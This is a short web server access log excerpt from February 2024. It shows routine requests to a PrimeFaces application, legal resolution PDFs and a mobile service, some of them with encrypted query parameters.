181.52.223.52 - - [03/Feb/2024:08:44:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 91744
157.90.251.233 - - [03/Feb/2024:08:44:53 -0500] "GET / HTTP/1.1" 200 4720
181.52.223.52 - - [03/Feb/2024:08:44:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 29826
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [03/Feb/2024:08:43:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60676
186.102.56.13 - - [03/Feb/2024:08:45:30 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/OvT5/zYR5vo+rydIHLBqMjThwfVqxE7AaqGpjzybBmweOUsHeZz5w&y=U2FsdGVkX1909jN6uEOmLFHcHE3NKdGAm4xcWKd+e0E7+V/2WhSsodsg83yccB4D HTTP/1.1" 200 30
186.102.56.13 - - [03/Feb/2024:08:45:30 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/dO2iQYEV2ebA7CihJY4pXzFAv7FsP+TcZWJ2s1EdGMABCic0f/I8czqx1L5VM7iPYB1sHGj2Ge6WzFAA0MMGNU+pgxIbc7QU=&u=U2FsdGVkX1+ZxHlKK/xpmab29WB18sB6ag2Y42rfJkHYKMGnpFTtxXcwpow4kdH5&y=U2FsdGVkX1909jN6uEOmLFHcHE3NKdGAm4xcWKd+e0E7+V/2WhSsodsg83yccB4D HTTP/1.1" 200 97
186.102.56.13 - - [03/Feb/2024:08:45:30 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19RiYXXYax+oecBxkseGyjG+m95I2460ReyHiVr9bZ7kdwAL5HAFlKFDUPLMzVpw7LNWjdyIx3FILQd6gUoma8ok2HZcN5gVCx7VXaq9UVxJq8hgciVZKiOx+D/M9UzbYuoP+bunPT6um5S7fFbsat2q2aTyZQNPBuiqD173eW9NVBhFGY7wSV0p+3WENnV/e5AIBc8NMgQtXjVltLjScXEBOE/9kHSJSSyICtT0Rjysxlr2H1/QYnjukjJ8yY7eo4qen+UTwZJWqBA0xmSWdqoNsq9LdLaJli7ea6DWosW+xPkqUo6APb0EvfHCCMTw8UuIIeix+in97tIxii80ebBceR8sMZK57iuCOuNgmhm/PRqkkBcXAGBkVvNrBq4vC2GqLVxRYHIYlfsHQAWkm6cnqF2rmgkzKCXAnNJApH2l0NvFwP1RyNwcext3JVdmPy1ReCdYNoH26AKPtBV7RT2uMntv0RIAx1qda/DZ+JqusUUHBJX30SS8zuuAonXk+QJtUM/xbxb/cOBz3i/945IiWIFbHRwumUgc07tZ0pjidGnWac752XlzCcAbWpo7pYf5dHXZWuYX00BWNASPxBbuQqayBeYP4KUGNcC+lCxROdDGvn2mLRlIDUa1VHU463jMSola3VI8ZldmHY0x1UKQRCNjB8gj+kVq4E/zImqPnZRmC0ksUb7JZjje/KTtsA9s7nGS/88ym0Pg7XmxOKN1pnoxMkJwg/MR9SmODw36oFZ/QBmxQfMX4mp/4BDvCdIwlDceswuQH0iF6Xze3Bcyw584ovX5qtJqXLNQQzPOVOs1u5HbgmZZf0HB8z7pfC9xxLKZv/VKh4dpWWGjCUMsRzVexrmeelLYRBNVNEMLG6+mJX/AMdOIaxTsG2E9ft+YxtrozX+UXLQ5YXPT+/0bGglfhr35Vy2cl22xAZy7heTUB66HsPqylxyuTNzVdhKeYLdhygeS8xchB+N+6vjLRgxwg4MGGiuu+UvXaAtO0hZZRSCMz0MgoInxopax1NPCaLUSzmRIA8IqmSP0bk/lHeuiYbRmMceCDCjllzX5UGvAY18/23/2KKpOtGWrsJlb2D6lfKDtCdS8VwELcLZ+mXMVgEEQruUbzmrc41SiZbNwp3Pg1+Qt72k+hoNKJafDGKLk0yvhs+3nkbuJkQ2rJewLikZDS71XWE/ntBcQm3V8v9tXFNp5jtL8K8FN8v2Dp6Rz1Begb5Eww9MyJ1sLBOaFSVvtBIJFG0hVHA3J3gbnJmFGRsQ5DuMiDyOA1qSFGCgUF41aO4tXoHZbIliuibikFgOXL9qQvP/lGrCsda6wZwA6XLPpFjtjUK7rC5fCRVOK7Zusa27m3cAIZCgLzZjfmfiy1dy+umslVtORtYtC30bwsJTVizS8hz9L+YCN60Q/Auvgn/LSqWtDm5rrvuSPhV0tKZkcIkHTocivgJBMdiHJEQT8MTCLT1vlxFQK1ukqhy0pVREewR5S+IWx4lBzsBqjg+l43fzAC9KEJ4+RP+cyF5g5cazLI63T4D9SzT3QkkvQKiMIERldFfevWnwWg7hK60DpgdS+8+k8E0XVLsoEC8e9VySEaQ+oIQo0uB+HbbjWnlpV1QU/ixDkorQJIstU8Xr1u2JxHmzcvtci85tjJMVruCoHGrcAbpbq7uFpWArBVkbur4Mnw5Hf7GeiYGoKCoZSgC/PqTom69bmewq9pHDIy1BA7OTDkYph0LXzRf2hQsa6G6dazMwwj/kaqSs2Fh2sPrt9hrPoavwBTMaHTgo&u=U2FsdGVkX1+ZxHlKK/xpmab29WB18sB6ag2Y42rfJkHYKMGnpFTtxXcwpow4kdH5&y=U2FsdGVkX1909jN6uEOmLFHcHE3NKdGAm4xcWKd+e0E7+V/2WhSsodsg83yccB4D HTTP/1.1" 200 1686
186.102.56.13 - - [03/Feb/2024:08:45:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19ZhTLKl7tiTiJlu4z016dM3WxCbuj/By5Mp5szV+B0eO1PpyDWqaMjdepthhAuMFzqjgF7Pj5b/GBRqetXrl/zdRyEPbLe3/ycOfF9ornVJjLVr4YY3/9QnKwIOs6TWiDQCiUpiNDmCgM2hUapFwl9RRcf8xwzyZzj6BN2WS5J7gEPp3+mqJqAj7Cy+TqrjF8Glld69xaTV9ZRGAhgWuhQPWr33jeZefNdH0NXvgbg3YfAwce0CtCAv3HMggeVgyG3yYgliN5OJdBMlGnNrZ+E3CaH+rXE68SIHMis7YIwc0iedum9Ult2vEsWkhDUj9h8NelAl7BfklxyKrngPVs1wr/oyRqjULnx+pA7E6pqVK+nrH1QO4k0+2VBk4DUD//ZoYKfDY3ZfXtouGEoQgvNqPya0IXbIWkzfEsDEAwxoEsGzyGlI2XvW+wS9XU1859UbmCB1OwhpAJpzyBpaJIyYFlonHtfMbR0N7lsWUg+XpSI6n8da6DIXLD+mY6DrWzT2HRSEho+4kGj9ocVNsTbihik69OqsHmf89VZlWlzjjBCVZYZBmmMyLUFQBQvbOJwnZWdXkzWP6bBh3rA/ZlfNDLtuQ+4geoBr5sWto143d11orwS49pLIvQ3Nw7B5aO6taEYB2Eo2QKHvTMN/WlLF/9qB1GFBMOjBXX+ybWZ+Io3NinHSxvdLQGYgQ6jtoDeyZT9VBZzHgOko2zbQXENrR8sDQKy1D+hs1u7SSlQBhDktb/upb5o&u=U2FsdGVkX1+ZxHlKK/xpmab29WB18sB6ag2Y42rfJkHYKMGnpFTtxXcwpow4kdH5&y=U2FsdGVkX1909jN6uEOmLFHcHE3NKdGAm4xcWKd+e0E7+V/2WhSsodsg83yccB4D HTTP/1.1" 200 208
186.102.56.13 - - [03/Feb/2024:08:45:31 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/OvT5/zYR5vo+rydIHLBqMjThwfVqxE7AaqGpjzybBmweOUsHeZz5w HTTP/1.1" 200 32032
201.245.192.253 - - [03/Feb/2024:08:45:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
207.46.13.130 - - [03/Feb/2024:08:45:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4742.pdf HTTP/1.1" 200 430813
216.245.221.92 - - [03/Feb/2024:08:46:02 -0500] "HEAD / HTTP/1.1" 200 -
45.131.111.142 - - [03/Feb/2024:08:48:45 -0500] "GET / HTTP/1.1" 200 319
52.167.144.194 - - [03/Feb/2024:08:49:28 -0500] "GET / HTTP/1.1" 200 4720
216.244.66.195 - - [03/Feb/2024:08:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/3917.pdf HTTP/1.1" 200 1296247
